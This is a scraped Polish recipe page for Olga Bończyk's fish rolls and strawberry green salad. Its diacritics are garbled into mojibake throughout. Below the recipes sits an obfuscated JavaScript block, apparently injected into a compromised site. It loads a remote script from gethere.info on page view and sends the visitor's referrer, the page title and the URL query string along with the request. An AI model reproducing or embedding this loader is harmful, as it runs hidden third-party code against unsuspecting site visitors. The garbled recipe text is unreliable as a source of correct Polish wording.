Olga BoA�czyk i jej kulinarne przepisy!

Olga BoA�czyk i jej kulinarne przepisy!


Olga BoA�czyk

W ksiA�A?ce „Gwiazdy gotujA� dla nas” opowiada o swoich kuchennych eksperymentach. Twierdzi, A?e uwielbia jeA�A�, a nie lubi odtwarzaA� ciA�gle tych samych potraw, dlatego wymyA�la wA�asne przepisy, kombinuje, odkrywa nowe smaki. Przez caA�e swoje dzieciA�stwo i mA�odoA�A� nie znosiA�a ryb, a teraz staA�a siA� ich wielkA� fankA�. „Ryby dzisiaj jem w kaA?dej postaci. Unikam smaA?enia, ale robiA� ryby pieczone, zawijane, roladki – smaczne i lekkie, A?eby bez wyrzutA?w sumienia moA?na byA�o zjeA�A� dwa kawaA�ki, a nie jeden”- mA?wi Olga BoA�czyk. Poznajcie jej przepis na roladki z ryby!

Roladki z rybyA�

SkA�adniki: panga lub sola, marynowany imbir rA?A?owy lub biaA�y, cukinia lub por, banan, sA?l, masA�o

Panga to duA?a ryba, wiA�c trzeba jA� pokroiA� na cienkie plastry, nie grubsze niA? jeden centymetr. DA�ugie paski cukinii obsmaA?am na suchej patelni do momentu aA? zwiotczejA�. JeA?eli bierzemy pory, trzeba je zblanszowaA�: ja robiA� to w parowarze, ale moA?na po prostu wrzuciA� je na 3 minuty do gotujA�cej wody. Banan krojA� na kilka kawaA�kA?w. Na posolonym kawaA�ku ryby ukA�adam dwa-trzy kawaA�eczki imbiru, kawaA�ek banana, zawijam w zgrabnA� roladkA�, ktA?rA� z kolei zawijam w cukiniA� lub por. Spinam wykaA�aczkA� i wkA�adam do brytfanny. Na kaA?dy z kawaA�kA?w kA�adA� wiA?rek masA�a, po czym wstawiam brytfannA� do piekarnika (180-200 stopni) na 20-25 minut. Roladki moA?na rA?wnieA? robiA� bez banana. Danie podajA� z mojA� ulubionA� zielonA� saA�atA�, na ktA?rA� przepis poniA?ej.

Zielona saA�ata

SkA�adniki: mieszanka saA�at, truskawki, koperek, ziarna sezamu, miA?d, ocet balsamiczny, oliwa

BiorA� szpinak i mieszane saA�aty, moA?na teA? dodaA� rukolA�, listki bazylii. Do zieleniny dodajA� truskawki pokrojone wzdA�uA? albo w poprzek, posiekany koperek, ziarna sezamu i sA�onecznika upraA?one na suchej patelni. CaA�oA�A� polewam sosem: miA?d zagotowujA� w rondelku z identycznA� iloA�ciA� octu balsamicznego. StudzA� i mieszam z odrobinA� oliwy.


 

 var _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}